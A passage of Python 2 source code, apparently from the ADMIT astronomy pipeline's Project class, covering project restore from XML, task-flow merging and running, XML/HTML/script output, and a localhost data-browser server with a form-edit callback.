self.new = not os.path.exists(self.baseDir + self.baseFile)
else:
raise Exception("basedir %s not a file or directory? " % baseDir)
if zipfile.is_zipfile(self.baseDir + self.baseFile): # detect if the file is a zip file
with zipfile.ZipFile(self.baseDir + self.baseFile, 'r') as z:
z.extractall(self.basedir)
if not os.path.exists(self.basedir + "admit.xml"):
raise Exception("No admit.xml file located in ", self.basedir)
self.baseFile = "admit.xml"
else: # we are working with a new basedir
#create = False
if create:
self.mkdir(baseDir)
self.new = True
if baseDir[-1] == os.sep:
self.baseDir = baseDir
else:
self.baseDir = baseDir + os.sep
self.baseFile = "admit.xml"
logging.init(self._loggername, baseDir + os.sep + "admit.log", self.loglevel)
if not Admit.loginit:
# @todo should this be in logging? for now, do here
logging.addLevelName(logging.TIMING, "TIMING")
logging.addLevelName(logging.REGRESSION, "REGRESSION")
Admit.loginit = True
if not self.new: # load the existing files/data
# @todo the AT's need the self.baseDir
# until then checkfiles() will complain the BDP.getfiles() don't exist on a re-run
# notice admit is passed to the Parser
parser = Parser.Parser(self, self.baseDir, self.baseFile)
parser.parse()
self._fm0 = parser.getflowmanager()
self._fm0._summaryData = parser.getSummary()
self._fm0._twins = {} # dict of merged tasks
# Re-initialize project manager.
for pid in parser.projmanager:
# Managed projects must be fully formed and up to date.
parser.projmanager[pid].mergeFlow()
self.pm.addProject(parser.projmanager[pid])
# Replace linked ATs in multiflows with their master copies.
# Only the latter contain validated BDP data.
for tid in self._fm0:
at = self._fm0[tid]
pid = at.getProject()
if pid:
# This task is linked from another project.
if pid in self.pm:
tid0 = at.id(True)
if tid0 in self.pm[pid].fm:
# Copy master AT reference.
self._fm0[tid] = self.pm[pid].fm[at.id(True)]
else:
raise Exception('No task #%d in project #%d' % (tid0, pid))
else:
raise Exception('No linked project #%d' % pid)
if commit: self.mergeFlow()
#print "ADMIT.baseDir = ", self.baseDir
if self.baseDir[-1:] != os.sep:
raise Exception('ADMIT.basedir=%s does not end with %s' % (self.baseDir, os.sep))
# data server for locahost web browing
if self._data_server:
self.startDataServer()
else:
self._data_url = None
signal.signal(signal.SIGUSR1, self._signal_handler)
self._pid = os.getpid()
if self.userData.has_key('flowcount'):
self.count = self.userData['flowcount'] + 1
else:
self.count = 1
self.userData['flowcount'] = self.count
print "ADMIT flowcount = %d stale = %d" % (self.count,self.astale)
def __str__(self):
print bt.format.BOLD + bt.color.GREEN + "ADMIT :" + bt.format.END
print self.fm
return ""
def __del__(self):
logging.shutdown()
def __len__(self):
""" Returns the numbers of tasks in the project.
"""
return len(self.fm)
def __contains__(self, tid):
"""Flow tasks membership operator.
Parameters
----------
tid : int
Task ID number or alias name.
Returns
-------
bool
Membership result.
"""
return self.fm.__contains__(tid)
def __iter__(self):
"""Flow tasks iterator.
Returns
-------
iterator
Task iterator.
"""
return iter(self.fm)
def __getitem__(self, tid):
"""
Returns an AT, referred by its task ID (an integer >= 0).
Parameters
----------
tid : int
Task ID number or alias name.
Returns
-------
AT
Reference to AT with ID `tid`.
Notes
-----
A BDP (bdp_out) can be accessed by indexing the task, i.e.,
admit[task_id][bdp_out_id] returns a BDP.
"""
return self.fm[tid]
def version(self):
"""return version of ADMIT
"""
return admit.version.__version__
def setlogginglevel(self, level):
""" Method to set the logging level
Parameters
----------
level : int
The logging level to use
Returns
-------
None
"""
logging.setLevel(level)
def getlogginglevel(self):
""" Method to return the current logging level
Parameters
----------
None
Returns
-------
An int representing the current logging level
"""
return logging.getEffectiveLevel()
def mkdir(self, dirname):
"""Make a directory in the ADMIT hierarchy, if it doesn't exist yet.
It also allows an absolute path, in the classical unix sense, but
this is normally not needed.
Parameters
----------
dirname : str
Directory name.
Returns
-------
None
"""
if dirname[0] == os.sep:
# it's already an absolute path
dname = dirname
else:
# make it relative to the admit
dname = os.path.abspath(self.baseDir + dirname)
if not os.path.exists(dname):
try:
os.makedirs(dname)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(dname):
pass
else: raise
#print "ADMIT.mkdir: ",dname
def getFlow(self):
"""
Returns flow manager instance.
Parameters
----------
None
Returns
-------
FlowManager
Flow manager instance.
"""
return self.fm
def getManager(self):
"""
Returns project manager instance.
Parameters
----------
None
Returns
-------
ProjectManager
Project manager instance.
"""
return self.pm
def plotparams(self, plotmode=PlotControl.BATCH, plottype=PlotControl.PNG):
""" Determines if plots are saved and in what format.
These are based on simple matplotlib diagrams.
Common output formats are png and pdf.
Note: this only applies to new AT's started in a flow,
to change existing parameters in a re-run for example,
you will need to manually change the AT._plot_mode
and AT._plot_type
Parameters
----------
plotmode : int
Plotting mode. Default: PlotControl.BATCH
plottype : int
Plot format type. Default: PlotControl.PNG.
Returns
-------
None
See Also
--------
util.PlotControl plot modes and types.
"""
#if plotmode < 0:
# return (self.pmode,self.ptype)
self.pmode = plotmode
self.ptype = plottype
#AT._plot_mode = plotmode
#AT._plot_type = plottype
# nasty cheat, need to formalize a safer method to talk to APlot
# @todo this also means the XML reader will not properly pass this on
#aplot.APlot.pmode = plotmode
# aplot.APlot.ptype = plottype
#print "plotmode: pmode=%d ptype=%s" % (self.pmode,self.ptype)
def addtask(self, a, stuples=None, dtuples=None):
"""
Add an AT to the project.
Also adjusts the connection mapping between tasks.
Usually all but the first task---typically, Ingest_AT---will have
'stuples' (a List of Source Tuples (task-id,bdp-id)). A source 2-tuple
consists of a task ID (``task-id``, such as returned by this method) and
BDP output slot number (``bdp-id``, zero-based). If the output slot is
zero (the tuple refers to the *first* BDP output from the task), then
the tuple can be replaced by the task ID for convenience---e.g.,
stuples = [(t1,0), (t2,1)] is equivalent to
stuples = [t1, (t2,1)].
Support for re-running scripts: this method will ignore attempts to
re-add a task of the same type and ID to the existing flow, if the
project has been restored from XML. Between invocations, scripts may be
edited to append new tasks to the flow, but not remove or insert them.
Keywords for existing ATs may also be changed by the script; if changes
are found, the existing task will be marked out-of-date.
Parameters
----------
a : AT
ADMIT task to append/insert into the flow.
stuples : list of 2-tuples, optional
List of source connection 2-tuples, one per BDP input port.
dtuples : list of 4-tuples, optional
List of destination connection 4-tuples.
Returns
-------
int
Input task ID on success, else -1 (error detected).
See Also
--------
add (FlowManager)
"""
# need to check if fm has been installed
# a.check() - was deprecated
# task should inherit these from ADMIT
# @todo some (pmode) could be changed without hard
# others (baseDir) probably not a good idea unless you cd around
a._plot_mode = self.pmode
a._plot_type = self.ptype
a.setloggername(self._loggername)
if not a.getProject():
# Reset base directory for local tasks only.
a.baseDir(self.baseDir)
else:
# Increment link count for tasks from other projects.
a.link()
if stuples != None:
raise Exception("addtask: cannot specify stuples for linked task")
# now add the BDP_in's to the AT
# note the BDP_out's are generated later, and cannot be added via fm.add() at this stage
#
return self.fm.add(a, stuples, dtuples)
def findtask(self, isMatch):
"""
Finds ATs in the flow matching a criterion.
Applies the function `isMatch` to all ATs in the flow, in proper
dependency order, accumulating matching ATs in a list (the return
value). Downstream ATs are guaranteed to follow their predecessors in
this list. Often `isMatch` may be conveniently expressed as a lambda
function.
Parameters
----------
isMatch : bool functor(AT)
Function object taking one AT as input and returning a Boolean.
Returns
-------
list of ATs
ATs testing True using `isMatch`.
Notes
-----
This method is a wrapper for `FlowManager.find()
<FlowManager.html#admit.FlowManager.FlowManager.find>`_.
Examples
--------
To find all ATs with ID less than 100 in project `p`:
>>> p.find(lambda at: at.id() < 100)
"""
return self.fm.find(isMatch)
def dir(self):
"""See AT.dir() but placed here for convenience as well.
Parameters
----------
None
Returns
-------
str
Base directory.
"""
return self.baseDir
def exit(self, exit):
""" Early cleanup and exit if exit > 0
Parameters
----------
exit : int
The exit code to exit with (must be > 0)
Returns
-------
None
"""
if exit > 0:
self.run()
logging.error("exit %d" % exit)
os._exit(exit) # quick exit, return status 'exit'
#sys.exit(exit) # exit back to CASA, which then becomes confused and return status 0
else:
logging.info("exit %d" % exit)
os._exit(0)
def mergeFlow(self, finalize = True):
"""
Merges tasks from the XML-derived flow (if any).
When projects are restored to memory from persistent XML files, that
task flow is initially held in stasis while the (possibly modified)
flow is being reconstructed, typically by re-running a script. This
reconstruction phase lasts from the point where the XML is read up to
the first call to this method with `finalize` set (most typically, the
first call to run(), which calls this method internally). Calling this
method during reconstruction compares the old flow to the newly
constructed flow and tasks present unaltered in the new flow (i.e.,
same BDP inputs and keyword values as before) are marked up to date, if
they were up to date in the original flow. Other relevant attributes
are transferred as appropriate.
Parameters
----------
finalize : bool, optional
Whether to discard the XML-derived flow after merge analysis,
preventing future merge attempts.
Returns
-------
None
Notes
-----
It is permissible to add or remove arbitrary tasks from the flow, in an
arbitrary order, while reconstructing it. Tasks unaffected by the
changes (if any) will not be re-executed gratuitously.
After finalization, the old flow is forgotten and subsequent calls will
have no effect (and likewise for fresh projects not backed by XML).
"""
if self._fm0:
# print "-- fm0 -- "
# self._fm0.show()
# print "-- fm (pre) -- "
# self.fm.show()
if self.fm:
# A non-empty flow has been constructed.
self.fm.mergeTasks(self.summaryData,
self._fm0,
self._fm0._summaryData,
self._fm0._twins, finalize)
else:
# No new flow; just restore the old one as-is.
self.summaryData = self._fm0._summaryData
del self._fm0._summaryData
del self._fm0._twins
self.fm = self._fm0
self._fm0 = None
# Ensure new task IDs don't overwrite existing ones!
if self.fm: self.fm._taskid = 1 + max(self.fm._bdpmap.keys())
if finalize:
if self._fm0:
# Remove orphaned BDPs attached to any remaining unmatched tasks.
# These tasks are gone from the flow.
for tid0 in self._fm0:
if not self._fm0._twins.has_key(tid0):
task = self._fm0[tid0]
logging.warning("Task %s - '%s' no longer in flow; deleting "
"associated BDP data:" %
(task._type, task._alias))
for bdp in self._fm0[tid0]:
if bdp is not None:
logging.warning(" BDP Name: %s Type: %s Uid: %d" %
(bdp.show(), bdp._type, bdp._uid))
bdp.delete()
self._fm0 = None
# print "-- fm (post) -- "
# self.fm.show()
# def __run__(self, write=True):
# print "******************DOING RUN IN THREADPOOL*************************"
# writeargs = [write]
# self.pool.map(self.__run__,writeargs)
# print "******************DONE RUN IN THREADPOOL*************************"
def _signal_handler(self,num,stack):
print 'Received signal %d in %s' % (num, threading.currentThread())
sys.stdout.flush()
sys.stderr.flush()
self.run()
def dryrun(self):
self.fm.dryrun()
def run(self, write=True, commit=True):
"""
Runs the project flow.
Run those pieces of the pipeline flow
deemed out of date. After the run, the flow
tasks gather their summary into ADMIT's summaryData,
ensuring that summaryData always is consistent with the
current flow, and does not contain remnants from orphans.
Parameters
----------
write : bool, optional
Whether to write the project XML files after running the flow;
default is ``True``.
commit: bool, optional
Whether to commit the current flow after merging flow tasks with
the XML-derived flow (if present). Set to ``False`` during incremental
run()/addtask() flow reconstruction. Once a flow is committed, all
requests to add or remove flow tasks will vest immediately. Default
is ``True``.
Returns
-------
None
See Also
--------
mergeFlow
Notes
-----
This method supports intelligent re-running of projects read from XML.
Task flows may be reconstructed (as in a script) in any order, from the
point where the XML is read up to the first call to run() (with
commit=True). Tasks present (unaltered) in the new flow and marked up
to date in the XML will not be re-executed.
"""
# For multiflows, re-run parent projects first. This ensures all
# linked tasks (which could depend on each other, if linked from the
# same parent) are processed in the correct order.
logging.info("ADMIT run() called [flowcount %d]" % self.count)
for pid in self.pm:
self.pm[pid].run()
# Merge XML-backed flow, if any.
self.mergeFlow(commit)
# Make current project summary globally available to ATs.
# It will be updated on-the-fly in FlowManager.run().
admit.Project.summaryData = self.summaryData
try:
self.fm.run()
except:
logging.error("Project run() failed; %s : saving state..." % str(sys.exc_info()))
self.write()
raise
# print "-- fm (run) -- "
# self.fm.show()
self.userdata()
if write: self.write() # includes HTML update
cpu = self.dt.end()
logging.info("ADMIT run() finished [flowcount %d] [cpu %g %g ]" % (self.count,cpu[0],cpu[1]))
def print_summary(self):
"""Print out summary data
Parameters
----------
None
Returns
-------
None
"""
print "############## SUMMARY DATA ###############"
self.summaryData.show()
def userdata(self):
"""Collects current AT userdata. **warning:** No check is done for duplicate keys!
Parameters
----------
None
Returns
-------
None
"""
for tid in self.fm:
self.userData.update(self.fm[tid].userdata())
def updateHTML(self):
"""Writes out HTML views of this object.
It is expected that summary() has been called first.
Parameters
----------
None
Returns
-------
None
"""
admitresources = utils.admit_root() + os.sep + "etc" + os.sep + "resources"
d = self.dir() + "resources"
#grmph, this gets CVS directory too. need to remove separately
cmd = "rm -rf %s && cp -r %s %s" % (d, admitresources, d)
os.system(cmd)
# rm CVS
for (path,dirs,files) in os.walk(d):
if path.endswith("CVS"):
utils.remove(path)
dotfile = self.dir()+'admit.dot'
self.fm.diagram(dotfile)
# Attempt to create a PNG from the dot file.
# summary.html() will look for this. Ignore
# if 'dot' is not on system (retval nonzero)
#
# Command must be in a list because shell=True is a security hazard.
# See https://docs.python.org/2/library/subprocess.html#using-the-subprocess-module
cmd = ["dot", "-Tpng", "-o", self._dotdiagram(), dotfile]
try:
retval = subprocess.call(cmd)
if retval !=0: diagram = ""
except:
diagram = ""
self.summaryData.html(self.dir(), self.fm, self._dotdiagram())
self.atToHTML()
self.logToHTML()
def atToHTML(self):
"""Write individual AT data to the html form"""
self.fm.connectInputs() # throws exception
admitloc = utils.admit_root()
admitetc = admitloc + os.sep + "etc"
admitfile = admitetc + os.sep + "form_at.html"
admit_headfile = admitetc+os.sep+"form_head.html"
admit_tailfile = admitetc+os.sep+"form_tail.html"
# self.dir() has trailing slash, need to strip it or
# basename() returns ''
# python basename() behavior different from Unix!!
outdir = self.dir()
basedir = os.path.basename(outdir.rstrip(os.sep))
# Spit out the boiler plate header that is the same for
# all form.html files.
try:
with open(admit_headfile,"r") as h:
header = h.read() % (basedir,basedir)
outfile = outdir + "form.html"
f = open(outfile,"w")
f.write(header)
except:
return
try:
with open(admitfile,"r") as h:
header = h.read()
except:
return
xx = '\n'
for tid in self.fm:
xx = xx + self.fm[tid].html(header)
f.write(xx)
# Spit out the boiler plate tail that is the same for
# all form.html files.
try:
with open(admit_tailfile,"r") as h:
tail = h.read() % datetime.datetime.now()
f.write(tail)
except:
f.close()
return
f.close()
def logToHTML(self):
"""Write the admit.log to an html file"""
admitloc = utils.admit_root()
admitetc = admitloc + os.sep + "etc"
admitfile = admitetc + os.sep + "log_template.html"
outdir = self.dir()
basedir = os.path.basename(outdir.rstrip(os.sep))
admitlog = outdir + "admit.log"
outfile = outdir + "log.html"
try:
with open(admitfile,"r") as h:
template = h.read()
with open(admitlog,"r") as l:
logtext = l.read()
with open(outfile,"w") as f:
f.write(template % (basedir, basedir, logtext, datetime.datetime.now()) )
f.close()
except Exception, e:
print e
return
def script(self, pyfile):
"""
Generates a Python script regenerating the current project.
The resulting script is intended to recreate the project results from
scratch and to be run from the *parent* of the project directory.
Running the script over existing project results is unpredictable and
not supported.
Parameters
----------
pyfile : str
Output Python script file name.
Returns
-------
None
"""
py = open(pyfile, mode='w')
dirs = os.path.split(self.dir()[:-1])
py.write("#!/usr/bin/env casarun\n"
"#\n"
"# This script was auto-generated by ADMIT version %s"
" and may be overwritten;\n"
"# copy before editing. It expects to run from %s/.\n"
"# If you need to start from scratch: rm -rf %s\n"
"#\n" % (self.version(),dirs[0],dirs[1]))
# If we're processing only one FITS cube, let the user specify a
# different one on the command line.
tcube = []
for tid in self.fm._depsmap[0]:
if self[tid]._type == 'Ingest_AT': tcube.append(tid)
if len(tcube) == 1:
tcube = tcube[0]
py.write("# This flow processes a single data cube. "
"To process other cubes in the same\n"
"# way, call this script with another cube file "
"as the command line argument:\n"
"# %% admit0.py CUBEFILE\n"
"#\n"
"import os, sys\n"
"import admit\n\n"
"# Command line processing.\n"
"argv = admit.utils.casa_argv(sys.argv)\n"
"if len(argv) < 2:\n"
" cubefile = '%s'\n"
" projdir = '%s'\n"
"else:\n"
" cubefile = argv[1]\n"
" projdir = os.path.splitext(argv[1])[0] + '.admit'\n\n"
"# Master project.\n"
"p = admit.Project(projdir, commit=False)\n"
% (self[tcube].getkey('file'), dirs[1]))
else:
tcube = None
py.write("import admit\n\n"
"# Master project.\n"
"p = admit.Project('%s', commit=False)\n" % (dirs[1]))
self.pm.script(py, self.dir())
self.fm.script(py, tcube=tcube)
py.write("\n# Update project.\n"
"p.run()\n")
py.close()
os.chmod(pyfile, 0o755);
def show(self):
""" Prints project state.
Parameters
----------
None
Returns
-------
None
Notes
-----
Currently only display FlowManager contents.
"""
print "==== ADMIT(%s) ====" % (self.name)
self.fm.show()
def browse(self):
"""Open a web browser tab with the URL of this admit project"""
try:
webbrowser.open_new_tab(url=self._data_url)
except Exception, e:
logging.warning("Couldn't open URL '%s' because %s" % (self._data_url,e))
def showsetkey(self, outfile=None):
""" Show current keys for tasks
For now on screen, but meant to aid writing a template file for rerun
Parameters
----------
outfile : str
The name of the output file
Returns
-------
None
"""
self.fm.showsetkey(outfile)
def set(self, **kwargs):
""" Sets keys and values in userData.
Parameters
----------
kwargs : dictionary like
Command line arguments for the function, can be a=x,b=y or
\*\*{a:x, b:y} format
Returns
-------
None
"""
self.userData.update(kwargs)
def check(self):
""" Check all project BDPs for name collisions.
Also identifies orphaned branches of the tree.
A topological sort is needed as well, if they are not in the correct
execution order.
See Also
--------
UNIX tsort(1) program.
"""
pass
def get(self, key):
"""Get a global ADMIT parameter.
Parameters
----------
key : str
User-defined data keyword.
Returns
-------
str
User-defined (userData) keyword value.
Notes
-----
.. todo::
This method should mirror the way we do this in the AT
(setkey/getkey)
"""
if key in self.userData:
return self.userData[key]
else:
print "ADMIT: %s not a valid userData key" % key
def has(self, key):
"""Query if a global user key exists for this admit project.
Parameters
----------
key : str
User-defined data keyword.
Returns
-------
bool
True if keyword is present in userData, else False.
"""
return key in self.userData
def print_methods(self):
""" Print all the methods of this object and their doc string(s).
Parameters
----------
None
Returns
-------
None
"""
print '\n* Methods *'
for names in dir(self):
attr = getattr(self, names)
if callable(attr):
print names, ':', attr.__doc__
def print_attributes(self):
""" Print all the attributes of this object and their value(s).
Parameters
----------
None
Returns
-------
None
"""
print '* Attributes *'
for names in dir(self):
attr = getattr(self, names)
if not callable(attr):
print names, ':', attr
def print_all(self):
""" Calls all the methods of this object.
Parameters
----------
None
Returns
-------
None
"""
for names in dir(self):
attr = getattr(self, names)
if callable(attr) and names != 'print_all' and names != '__init__':
attr() # calling the method
def discover(self, mode=None, rootdir='.'):
"""Project data discovery.
Parameters
----------
mode : TBD
Discovery mode.
rootdir : str, optional
Search root directory.
Returns
-------
list
Search results.
"""
print "query_dir() and find_files() are the worker functions"
print "discover not implemented yet"
pp = []
return pp
#def query_dir(self,here=None):
# """
# Drill down and find directories in which ADMIT exists.
# Parameters
# ----------
# here : str, optional
# Directory to begin search; defaults to current directory.
# Returns
# -------
# list
# Search results.
# """
# dlist = []
# if here == None:
# path = "."
# else:
# path = here
# n = 0
# for path, dirs, files in os.walk(path):
# # better not to loop, but os.path() for existence
# n = n + 1
# for f in files:
# if f == self.parfile: dlist.append(path)
# logging.debug("Queried " + str(n) + " directories, found " +
# str(len(dlist)) + " with a parfile")
# return dlist
def find_bdp(self):
"""Find all bdp's in the current admit.
Parameters
----------
None
Returns
-------
list
All \*.bdp files within the admit hierarchy.
"""
len1 = len(self.dir())
matches = []
for root, dirnames, filenames in os.walk(self.dir()):
for filename in fnmatch.filter(filenames, '*.bdp'):
matches.append(os.path.join(root, filename)[len1:])
#print "BDPs:",matches
return matches
def find_files(self, pattern="*.fits"):
"""
Find files containing a wildcard pattern.
Parameters
----------
pattern : str, optional
File name wildcard pattern.
Returns
-------
list
File names matching the pattern.
"""
#@todo this should call util.find_files instead.
flist = []
for filename in os.listdir('.'):
if fnmatch.fnmatch(filename, pattern):
flist.append(filename)
return flist
def setdir(self, dirname, create=True):
"""
Changes current working directory. The directory is
assumed to contain parameter file.
.. note:: Deprecated.
See pushd()/popd() for a better version.
Parameters
----------
dirname : str
Directory to work in.
create : bool, optional
Whether to create the directory if it doesn't exist.
Notes
-----
.. todo::
the new mkdir() and self.baseDir are the way to work in ADMIT
"""
def mkdir_p(path):
#if not os.path.isdir(dirname):
# os.makedirs(dirname)
#
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
self.p = dirname
self.pwd = os.getcwd()
if create:
mkdir_p(dirname)
os.chdir(dirname)
logging.debug("ADMIT::setdir %s" % dirname)
def tesdir(self):
"""
Revert back from previous setdir (not recursive yet).
.. note:: Deprecated.
See pushd()/popd() for a better version.
"""
os.chdir(self.currDir)
#def walkdir(self,dlist):
# """Walks through directory list, printing what it finds
# Parameters
# ----------
# dlist : list of str
# Directory names to traverse.
# Returns
# -------
# None
# """
# print "Walkdir ", dlist
# for d in dlist:
# self.setdir(d)
# print "d: ", d
# par = pp.ParFile()
# print par.get('fits')
# print par.keys()
# self.tesdir()
def read(self):
"""Reads a project.
Notes
-----
Not implemented.
"""
pass
def export(self, mode):
"""
Prepare Admit for (archive) export. This means it has to loop over the BDP's
and decide which items are going to copied over to admit.userData{}, as admit.xml
is the only file external agents should have to look at.
See also the script "admit_export" which is currently doing this work.
Parameters
----------
mode : str
Export mode.
Returns
-------
None
Notes
-----
Not implemented.
"""
print "Export: ", mode
def write(self):
""" Writes out the admit.xml file, admit0.py script and
project html files.
Parameters
----------
None
Returns
-------
None
"""
self.writeXML()
self.updateHTML()
def writeXML(self, script = True):
""" Writes out the admit.xml file and admit0.py script.
Reading the XML file occurs in the constructor.
Parameters
----------
None
Returns
-------
None
"""
# For multiflows, rewrite parent project XML files in case
# any linked tasks were updated.
self.pm.write()
# get the dtd files, which acts as a guide
dtdRead = DtdReader("admit.dtd")
dtd = dtdRead.getDtd()
dtdlist = {}
# create the root node
root = et.Element("ADMIT")
# write out the each data member
unode = et.SubElement(root, "userData")
unode.set("type", bt.DICT)
nd = []
st = []
attr = copy.deepcopy(self.userData)
for k, v in attr.iteritems():
if isinstance(v, np.ndarray):
nd.append(k)
attr[k] = np.ndarray.tolist(v)
elif isinstance(v, set):
st.append(k)
attr[k] = list(v)
unode.set("ndarray", str(nd))
unode.set("set", str(st))
temptext = str(attr)
tt = ""
tlist = textwrap.wrap(temptext, width=10000)
for l in tlist:
tt += l + "\n"
unode.text = tt
# write out the summary data
self.summaryData.write(root)
pnode = et.SubElement(root, "project_id")
pnode.set("type", bt.INT)
pnode.text = str(self.project_id)
nnode = et.SubElement(root, "name")
nnode.set("type", bt.STRING)
temptext = self.name
tt = ""
tlist = textwrap.wrap(temptext, width=10000)
for l in tlist:
tt += l + "\n"
nnode.text = tt
fnode = et.SubElement(root, "flowmanager")
fnode.set("type", bt.DICT) #HERE
attr = copy.deepcopy(self.fm)
pmnode = et.SubElement(root, "pmode")
pmnode.set("type", bt.INT)
pmnode.text = str(self.pmode)
ptnode = et.SubElement(root, "ptype")
ptnode.set("type", bt.INT)
ptnode.text = str(self.ptype)
llnode = et.SubElement(root, "loglevel")
llnode.set("type", bt.INT)
llnode.text = str(self.loglevel)
llnode = et.SubElement(root, "astale")
llnode.set("type", bt.INT)
llnode.text = str(self.astale)
lnnode = et.SubElement(root, "_loggername")
lnnode.set("type", bt.STRING)
temptext = self._loggername
tt = ""
tlist = textwrap.wrap(temptext, width=10000)
for l in tlist:
tt += l + "\n"
lnnode.text = tt
fnode.set("ndarray", str([]))
fnode.set("set", str([]))
tasks = {} # make a simplified version of the connection map for writing out, it will be reconstructed on read in
for tid in self.fm:
tasks[tid] = None
temptext = str({"connmap" : self.fm._connmap,
"bdpmap" : self.fm._bdpmap,
"depsmap" : str(self.fm._depsmap),
"varimap" : str(self.fm._varimap),
"tasklevs": self.fm._tasklevs,
"tasks" : tasks})
tt = ""
tlist = textwrap.wrap(temptext, width=10000)
for l in tlist:
tt += l + "\n"
fnode.text = tt
pmnode = et.SubElement(root, "projmanager")
pmnode.set("type", bt.DICT)
pmnode.set("ndarray", str([]))
pmnode.set("set", str([]))
temptext = str(self.pm._baseDirs)
tt = ""
tlist = textwrap.wrap(temptext, width=10000)
for l in tlist:
tt += l + "\n"
pmnode.text = tt
#print 'Flow',fnode.text
for tid in self.fm:
root, tdtd = self.fm[tid].write(root)
dtdlist[self.fm[tid]._type] = tdtd
# generate a string from the nodes
rough_string = et.tostring(root, 'utf-8')
# make the text human readable
temp = rough_string.replace(">", ">\n")
temp = temp.replace("</", "\n</")
# open the output file
outFile = open(self.baseDir + "admit.xml", 'w')
# write out the header
outFile.write("<?xml version=\"1.0\" ?>\n")
# write out the dtd info at the top
outFile.write("<!DOCTYPE ADMIT [\n\n")
for line in dtd:
outFile.write(line)
for d in dtdlist:
for l in dtdlist[d]:
outFile.write(l)
outFile.write("]>\n\n")
# write out the data
outFile.write(temp)
outFile.close()
if script:
# Don't name script 'admit.py' to avoid confusing 'import admit'.
self.script(self.dir() + 'admit0.py')
def clean(self):
""" Method to delete orphan bdp's (files and underlying data)
Parameters
----------
None
Returns
-------
None
"""
files = utils.getFiles(self.dir())
for task in self.fm._tasks.values():
delfiles = []
for bdp in task._bdp_out:
if bdp is None:
continue
for i, file in enumerate(files):
if file.endswith(bdp.xmlFile + ".bdp"):
delfiles.append(i)
delfiles.sort()
delfiles.reverse()
for d in delfiles:
del files[d]
for file in files:
bdp = utils.getBDP(file)
print "DELETING",bdp.xmlFile
bdp.delete()
del bdp
def startDataServer(self):
"""Starts the data HTTP server.
On a separate thread, start the http server on localhost:_data_browser_port
that will allow web browsing of data products. Also attempt
to open a browser window at that URL. When this method returns,
the variable self._data_browser_port will have the value of
the port returned by the OS.
See util.AdmitHTTP.AdmitHTTPServer
Parameters
----------
None
Returns
-------
None
"""
if self._server != None:
print "A data server for this Admit object is already running on localhost:%d" % self._data_browser_port
return
server_address = ("localhost", self._data_browser_port)
try:
self._server = admit.util.AdmitHTTP.AdmitHTTPServer(server_address, docroot=self.baseDir, postcallback = self._onpost )
self._data_browser_port = self._server.server_address[1]
except:
print "Failed to get a port for the data browser."
return
threadName = "%s:%d" % (self.baseDir, self._data_browser_port)
thread = threading.Thread(name=threadName, target=self._serveforever, args=())
thread.setDaemon(True)
thread.start()
# create the attribute but we don't wish to save it in admit.xml
self._data_url = 'http://localhost:%d' % self._data_browser_port
print "Your data server is started on %s. Attempting to open a browser page with that URL. \nThe data server will halt when you quit your CASA session or otherwise destroy this ADMIT object." % self._data_url
# open page in new tab if possible
self.browse()
def url(self):
"""Print the URL for the data browser
Parameters
----------
None
Returns
-------
String representing localhost url on which data can be viewed.
"""
return self._data_url
def export(self,level=0,casa=True,fits=False,out=None):
# """export this Project to a gzipped tar file"""
if out == None: out=self._defaulttarfile()
def _defaulttarfile(self):
"""return an export file name baseDir.tar.gz for this project
"""
return self.baseDir+".tar.gz" # option for ZIP?
#def runqueue(self):
# try:
# print "callback queue get"
# callback = self.queue.get(False)
# except Queue.Empty:
# pass
# print "got"
# callback()
def _onpost(self, payload):
"""This is the callback function when a user edits ADMIT key words
via form.html. It will cycle through the tasks and call setkeys,
then call admit.run().
Parameters
----------
payload: dict
The data coming from the server.
Returns
-------
None (maybe should return boolean if something failed?)
Notes
-----
Should not be called directly.
"""
#@todo: make this method a dictionary of methods?
command = payload["command"]
logging.info("Got command %s from browser" % command)
if command == "run":
#print "got command run"
try:
for t in payload['task']:
taskid = int(t["taskid"])
for key in t:
# skip the hidden form inputs, which are only to
# sort out what task this is, and any other non-matching keys
if not self.fm[taskid].haskey(key):
continue
# Everything coming back from the web form is unicode.
# ast.literal_eval solves this, except for strings!
# (which would need nested quotes).
# So first decode the value to a string. We don't need to
# decode the key to a string because python dictionaries
# with support unicode key access.
value_enc = t[key].encode('utf8')
# Then do type-checking
# of the AT's key to decide whether to invoke ast.literal_eval.
# Note this may also be useful if the web form serialization
# is ever upgraded to preserve types (requires use of :types
# in form)
# See https://github.com/marioizquierdo/jquery.serializeJSON
#print "key=%s, val=%s type:%s" % (key,t[key],type(t[key]))
if type(value_enc) == type(self.fm[taskid]._keys[key]):
#print "straight setkey"
self.fm[taskid].setkey(key,value_enc)
else:
#print "AST key=%s, val=%s" % (key,ast.literal_eval(t[key]) )
self.fm[taskid].setkey(key,ast.literal_eval(t[key]))
except Exception, e:
print "Bummer, got exception %s" % e
traceback.print_exc()
return
try:
logging.info("Re-running admit...")
print "[you may have hit return here]"
#self.queue.put(self.run)
#self.runqueue()
os.kill(self._pid,signal.SIGUSR1)
#self.run(write=True)
#formurl = self._data_url+"/form.html"
#webbrowser.open(url=formurl,new=0)
if payload["firefox"] == True:
#print "Damn you, Firefox!"
formurl = self._data_url+"/form.html"
webbrowser.open(url=formurl,new=0)
return
except Exception, e:
print "got exception on run %s" % e
traceback.print_exc()
elif command == "dryrun":
try:
for t in payload['task']:
taskid = int(t["taskid"])
for key in t:
# skip the hidden form inputs, which are only to
# sort out what task this is, and any other non-matching keys
if not self.fm[taskid].haskey(key):
continue
value_enc = t[key].encode('utf8')
if type(value_enc) == type(self.fm[taskid]._keys[key]):
#print "straight setkey"
self.fm[taskid].setkey(key,value_enc)
else:
#print "AST key=%s, val=%s" % (key,ast.literal_eval(t[key]) )
self.fm[taskid].setkey(key,ast.literal_eval(t[key]))
# update all downstream stale flags, so that they
# get marked in the HTML file.
self.fm.connectInputs()
except Exception, e:
print "Bummer, got exception %s" % e
traceback.print_exc()
return
try:
#self.fm.dryrun()
self.write()
if payload["firefox"] == True:
#print "damn you, Firefox!"
formurl = self._data_url+"/form.html"
webbrowser.open(url=formurl,new=0)
return
except Exception, e:
print "got exception on dryrun %s" % e
traceback.print_exc()
return
elif command == "linelistbdp":
try:
taskid = payload["taskid"]
# replace the data in the Linelist bdp table
llbdp = self.fm[taskid]._bdp_out[0]
# this is an array of LineData objects
llbdp.table.data = np.array([], dtype=object)
rows = payload["rows"]
# @TODO the spectral image may no longer be correct,
# if we are forcing or rejecting lines
for t in rows:
if t['disposition'] != 'reject':
#print 'keeping %s' % t['uid']
